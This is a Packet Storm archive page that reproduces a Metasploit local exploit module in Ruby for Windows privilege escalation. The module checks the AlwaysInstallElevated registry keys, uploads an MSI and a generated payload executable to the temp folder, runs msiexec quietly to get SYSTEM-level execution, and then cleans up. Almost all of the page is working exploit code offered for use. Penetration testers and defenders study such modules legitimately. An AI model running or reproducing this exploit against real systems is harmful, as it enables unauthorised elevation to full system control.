what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Windows AlwaysInstallElevated MSI

Windows AlwaysInstallElevated MSI
Posted Nov 29, 2012
Authored by Parvez Anwar, Ben Campbell | Site metasploit.com

This Metasploit module checks the AlwaysInstallElevated registry keys which dictate if .MSI files should be installed with elevated privileges (NT AUTHORITY\SYSTEM). The default MSI file is data/exploits/exec_payload.msi with the WiX source file under external/source/exploits/exec_payload_msi/exec_payload.wxs. This MSI simply executes payload.exe within the same folder. The MSI may not execute successfully successive times, but may be able to get around this by regenerating the MSI. MSI can be rebuilt from the source using the WIX tool with the following commands: candle exec_payload.wxs light exec_payload.wixobj.

tags | exploit, registry
SHA-256 | c7e98f972baf436cdfffebb9e430a37c5fe6f420bfd185f513efaf7d19a631e2

Windows AlwaysInstallElevated MSI

Change Mirror Download
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'
require 'rex'
require 'msf/core/post/windows/registry'
require 'msf/core/post/common'
require 'msf/core/post/file'

class Metasploit3 < Msf::Exploit::Local
Rank = AverageRanking

include Msf::Exploit::EXE
include Msf::Post::Common
include Msf::Post::File
include Msf::Post::Windows::Registry

def initialize(info={})
super(update_info(info, {
'Name' => 'Windows AlwaysInstallElevated MSI',
'Description' => %q{
This module checks the AlwaysInstallElevated registry keys which dictate if
.MSI files should be installed with elevated privileges (NT AUTHORITY\SYSTEM).

The default MSI file is data/exploits/exec_payload.msi with the WiX source file
under external/source/exploits/exec_payload_msi/exec_payload.wxs. This MSI simply
executes payload.exe within the same folder.

The MSI may not execute succesfully successive times, but may be able to get around
this by regenerating the MSI.

MSI can be rebuilt from the source using the WIX tool with the following commands:
candle exec_payload.wxs
light exec_payload.wixobj
},
'License' => MSF_LICENSE,
'Author' =>
[
'Ben Campbell',
'Parvez Anwar' # discovery?/inspiration
],
'Arch' => [ ARCH_X86, ARCH_X86_64 ],
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ],
'DefaultOptions' =>
{
'WfsDelay' => 10,
'EXITFUNC' => 'thread',
'InitialAutoRunScript' => 'migrate -k -f'
},
'Targets' =>
[
[ 'Windows', { } ],
],
'References' =>
[
[ 'URL', 'http://www.greyhathacker.net/?p=185' ],
[ 'URL', 'http://msdn.microsoft.com/en-us/library/aa367561(VS.85).aspx' ],
[ 'URL', 'http://wix.sourceforge.net'] ,
],
'DisclosureDate'=> 'Mar 18 2010',
'DefaultTarget' => 0
}))

register_advanced_options([
OptString.new('LOG_FILE', [false, 'Remote path to output MSI log file to.', nil]),
OptBool.new('QUIET', [true, 'Run the MSI with the /quiet flag.', true])
], self.class)
end

def check
install_elevated = "AlwaysInstallElevated"
installer = "SOFTWARE\\Policies\\Microsoft\\Windows\\Installer"
hkcu = "HKEY_CURRENT_USER\\#{installer}"
hklm = "HKEY_LOCAL_MACHINE\\#{installer}"

local_machine_value = registry_getvaldata(hklm,install_elevated)

if local_machine_value.nil?
print_error("#{hklm}\\#{install_elevated} does not exist or is not accessible.")
return Msf::Exploit::CheckCode::Safe
elsif local_machine_value == 0
print_error("#{hklm}\\#{install_elevated} is #{local_machine_value}.")
return Msf::Exploit::CheckCode::Safe
else
print_good("#{hklm}\\#{install_elevated} is #{local_machine_value}.")
current_user_value = registry_getvaldata(hkcu,install_elevated)
end

if current_user_value.nil?
print_error("#{hkcu}\\#{install_elevated} does not exist or is not accessible.")
return Msf::Exploit::CheckCode::Safe
elsif current_user_value == 0
print_error("#{hkcu}\\#{install_elevated} is #{current_user_value}.")
return Msf::Exploit::CheckCode::Safe
else
print_good("#{hkcu}\\#{install_elevated} is #{current_user_value}.")
return Msf::Exploit::CheckCode::Vulnerable
end
end

def cleanup
if not @executed
return
end

begin
print_status("Deleting MSI...")
file_rm(@msi_destination)
rescue Rex::Post::Meterpreter::RequestError => e
print_error(e.to_s)
print_error("Failed to delete MSI #{@msi_destination}, manual cleanup may be required.")
end

begin
print_status("Deleting Payload...")
file_rm(@payload_destination)
rescue Rex::Post::Meterpreter::RequestError => e
print_error(e.to_s)
print_error("Failed to delete payload #{@payload_destination}, this is expected if the exploit is successful, manual cleanup may be required.")
end
end

def exploit

if check != Msf::Exploit::CheckCode::Vulnerable
@executed = false
return
end

@executed = true

msi_filename = "exec_payload.msi" # Rex::Text.rand_text_alpha((rand(8)+6)) + ".msi"
msi_source = ::File.join(Msf::Config.install_root, "data", "exploits", "exec_payload.msi")

# Upload MSI
@msi_destination = expand_path("%TEMP%\\#{msi_filename}").strip # expand_path in Windows Shell adds a newline and has to be stripped
print_status("Uploading the MSI to #{@msi_destination} ...")

#upload_file - ::File.read doesn't appear to work in windows...
source = File.open(msi_source, "rb"){|fd| fd.read(fd.stat.size) }
write_file(@msi_destination, source)

# Upload payload
payload = generate_payload_exe
@payload_destination = expand_path("%TEMP%\\payload.exe").strip
print_status("Uploading the Payload to #{@payload_destination} ...")
write_file(@payload_destination, payload)

# Execute MSI
print_status("Executing MSI...")

if datastore['LOG_FILE'].nil?
logging = ""
else
logging = "/l* #{datastore['LOG_FILE']} "
end

if datastore['QUIET']
quiet = "/quiet "
else
quiet = ""
end

cmd = "msiexec.exe #{logging}#{quiet}/package #{@msi_destination}"
vprint_status("Executing: #{cmd}")
begin
result = cmd_exec(cmd)
rescue Rex::TimeoutError
vprint_status("Execution timed out.")
end
vprint_status("MSI command-line feedback: #{result}")
end
end
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    0 Files
  • 8
    Nov 8th
    0 Files
  • 9
    Nov 9th
    0 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close